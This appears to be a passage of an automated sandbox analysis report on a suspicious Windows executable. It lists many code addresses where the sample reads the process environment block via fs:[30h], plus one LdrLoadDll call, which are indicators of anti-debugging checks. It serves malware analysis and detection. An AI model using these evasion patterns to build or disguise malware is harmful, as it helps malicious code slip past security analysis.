                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00417993 LdrLoadDll,2_2_00417993
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119A118 mov ecx, dword ptr fs:[00000030h]2_2_0119A118
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119A118 mov eax, dword ptr fs:[00000030h]2_2_0119A118
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B0115 mov eax, dword ptr fs:[00000030h]2_2_011B0115
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov eax, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov ecx, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01120124 mov eax, dword ptr fs:[00000030h]2_2_01120124
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01188158 mov eax, dword ptr fs:[00000030h]2_2_01188158
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC156 mov eax, dword ptr fs:[00000030h]2_2_010EC156
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6154 mov eax, dword ptr fs:[00000030h]2_2_010F6154
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01184144 mov eax, dword ptr fs:[00000030h]2_2_01184144
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01184144 mov ecx, dword ptr fs:[00000030h]2_2_01184144
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4164 mov eax, dword ptr fs:[00000030h]2_2_011C4164
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117019F mov eax, dword ptr fs:[00000030h]2_2_0117019F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AC188 mov eax, dword ptr fs:[00000030h]2_2_011AC188
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01130185 mov eax, dword ptr fs:[00000030h]2_2_01130185
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA197 mov eax, dword ptr fs:[00000030h]2_2_010EA197
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01194180 mov eax, dword ptr fs:[00000030h]2_2_01194180
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E1D0 mov eax, dword ptr fs:[00000030h]2_2_0116E1D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0116E1D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B61C3 mov eax, dword ptr fs:[00000030h]2_2_011B61C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011201F8 mov eax, dword ptr fs:[00000030h]2_2_011201F8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C61E5 mov eax, dword ptr fs:[00000030h]2_2_011C61E5
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E016 mov eax, dword ptr fs:[00000030h]2_2_0110E016
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E016 mov eax, dword ptr fs:[00000030h]2_2_0110E016
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E016 mov eax, dword ptr fs:[00000030h]2_2_0110E016
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E016 mov eax, dword ptr fs:[00000030h]2_2_0110E016
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01174000 mov ecx, dword ptr fs:[00000030h]2_2_01174000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01186030 mov eax, dword ptr fs:[00000030h]2_2_01186030
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA020 mov eax, dword ptr fs:[00000030h]2_2_010EA020
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC020 mov eax, dword ptr fs:[00000030h]2_2_010EC020
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176050 mov eax, dword ptr fs:[00000030h]2_2_01176050
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F2050 mov eax, dword ptr fs:[00000030h]2_2_010F2050
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111C073 mov eax, dword ptr fs:[00000030h]2_2_0111C073
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F208A mov eax, dword ptr fs:[00000030h]2_2_010F208A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B60B8 mov eax, dword ptr fs:[00000030h]2_2_011B60B8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B60B8 mov ecx, dword ptr fs:[00000030h]2_2_011B60B8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E80A0 mov eax, dword ptr fs:[00000030h]2_2_010E80A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011880A8 mov eax, dword ptr fs:[00000030h]2_2_011880A8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011720DE mov eax, dword ptr fs:[00000030h]2_2_011720DE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011320F0 mov ecx, dword ptr fs:[00000030h]2_2_011320F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F80E9 mov eax, dword ptr fs:[00000030h]2_2_010F80E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA0E3 mov ecx, dword ptr fs:[00000030h]2_2_010EA0E3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011760E0 mov eax, dword ptr fs:[00000030h]2_2_011760E0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC0F0 mov eax, dword ptr fs:[00000030h]2_2_010EC0F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01110310 mov ecx, dword ptr fs:[00000030h]2_2_01110310
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A30B mov eax, dword ptr fs:[00000030h]2_2_0112A30B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A30B mov eax, dword ptr fs:[00000030h]2_2_0112A30B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A30B mov eax, dword ptr fs:[00000030h]2_2_0112A30B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC310 mov ecx, dword ptr fs:[00000030h]2_2_010EC310
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C8324 mov eax, dword ptr fs:[00000030h]2_2_011C8324
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C8324 mov ecx, dword ptr fs:[00000030h]2_2_011C8324
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C8324 mov eax, dword ptr fs:[00000030h]2_2_011C8324
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C8324 mov eax, dword ptr fs:[00000030h]2_2_011C8324
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BA352 mov eax, dword ptr fs:[00000030h]2_2_011BA352
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01198350 mov ecx, dword ptr fs:[00000030h]2_2_01198350
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov ecx, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C634F mov eax, dword ptr fs:[00000030h]2_2_011C634F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119437C mov eax, dword ptr fs:[00000030h]2_2_0119437C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE388 mov eax, dword ptr fs:[00000030h]2_2_010EE388
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE388 mov eax, dword ptr fs:[00000030h]2_2_010EE388
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE388 mov eax, dword ptr fs:[00000030h]2_2_010EE388
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8397 mov eax, dword ptr fs:[00000030h]2_2_010E8397
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8397 mov eax, dword ptr fs:[00000030h]2_2_010E8397
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8397 mov eax, dword ptr fs:[00000030h]2_2_010E8397
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111438F mov eax, dword ptr fs:[00000030h]2_2_0111438F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111438F mov eax, dword ptr fs:[00000030h]2_2_0111438F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E3DB mov eax, dword ptr fs:[00000030h]2_2_0119E3DB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E3DB mov eax, dword ptr fs:[00000030h]2_2_0119E3DB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E3DB mov ecx, dword ptr fs:[00000030h]2_2_0119E3DB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E3DB mov eax, dword ptr fs:[00000030h]2_2_0119E3DB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011943D4 mov eax, dword ptr fs:[00000030h]2_2_011943D4
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011943D4 mov eax, dword ptr fs:[00000030h]2_2_011943D4
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F83C0 mov eax, dword ptr fs:[00000030h]2_2_010F83C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F83C0 mov eax, dword ptr fs:[00000030h]2_2_010F83C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F83C0 mov eax, dword ptr fs:[00000030h]2_2_010F83C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F83C0 mov eax, dword ptr fs:[00000030h]2_2_010F83C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AC3CD mov eax, dword ptr fs:[00000030h]2_2_011AC3CD
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011763C0 mov eax, dword ptr fs:[00000030h]2_2_011763C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E3F0 mov eax, dword ptr fs:[00000030h]2_2_0110E3F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E3F0 mov eax, dword ptr fs:[00000030h]2_2_0110E3F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E3F0 mov eax, dword ptr fs:[00000030h]2_2_0110E3F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011263FF mov eax, dword ptr fs:[00000030h]2_2_011263FF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E823B mov eax, dword ptr fs:[00000030h]2_2_010E823B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C625D mov eax, dword ptr fs:[00000030h]2_2_011C625D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AA250 mov eax, dword ptr fs:[00000030h]2_2_011AA250
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AA250 mov eax, dword ptr fs:[00000030h]2_2_011AA250
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01178243 mov eax, dword ptr fs:[00000030h]2_2_01178243
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01178243 mov ecx, dword ptr fs:[00000030h]2_2_01178243
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6259 mov eax, dword ptr fs:[00000030h]2_2_010F6259
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA250 mov eax, dword ptr fs:[00000030h]2_2_010EA250
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E826B mov eax, dword ptr fs:[00000030h]2_2_010E826B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4260 mov eax, dword ptr fs:[00000030h]2_2_010F4260
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4260 mov eax, dword ptr fs:[00000030h]2_2_010F4260
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4260 mov eax, dword ptr fs:[00000030h]2_2_010F4260
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01170283 mov eax, dword ptr fs:[00000030h]2_2_01170283
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01170283 mov eax, dword ptr fs:[00000030h]2_2_01170283
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01170283 mov eax, dword ptr fs:[00000030h]2_2_01170283
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E284 mov eax, dword ptr fs:[00000030h]2_2_0112E284
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E284 mov eax, dword ptr fs:[00000030h]2_2_0112E284
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002A0 mov eax, dword ptr fs:[00000030h]2_2_011002A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002A0 mov eax, dword ptr fs:[00000030h]2_2_011002A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov ecx, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C62D6 mov eax, dword ptr fs:[00000030h]2_2_011C62D6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002E1 mov eax, dword ptr fs:[00000030h]2_2_011002E1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002E1 mov eax, dword ptr fs:[00000030h]2_2_011002E1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002E1 mov eax, dword ptr fs:[00000030h]2_2_011002E1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01186500 mov eax, dword ptr fs:[00000030h]2_2_01186500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8550 mov eax, dword ptr fs:[00000030h]2_2_010F8550
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8550 mov eax, dword ptr fs:[00000030h]2_2_010F8550
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112656A mov eax, dword ptr fs:[00000030h]2_2_0112656A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112656A mov eax, dword ptr fs:[00000030h]2_2_0112656A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112656A mov eax, dword ptr fs:[00000030h]2_2_0112656A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F2582 mov eax, dword ptr fs:[00000030h]2_2_010F2582
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F2582 mov ecx, dword ptr fs:[00000030h]2_2_010F2582
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E59C mov eax, dword ptr fs:[00000030h]2_2_0112E59C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01124588 mov eax, dword ptr fs:[00000030h]2_2_01124588
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011145B1 mov eax, dword ptr fs:[00000030h]2_2_011145B1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011145B1 mov eax, dword ptr fs:[00000030h]2_2_011145B1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011705A7 mov eax, dword ptr fs:[00000030h]2_2_011705A7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011705A7 mov eax, dword ptr fs:[00000030h]2_2_011705A7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011705A7 mov eax, dword ptr fs:[00000030h]2_2_011705A7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A5D0 mov eax, dword ptr fs:[00000030h]2_2_0112A5D0
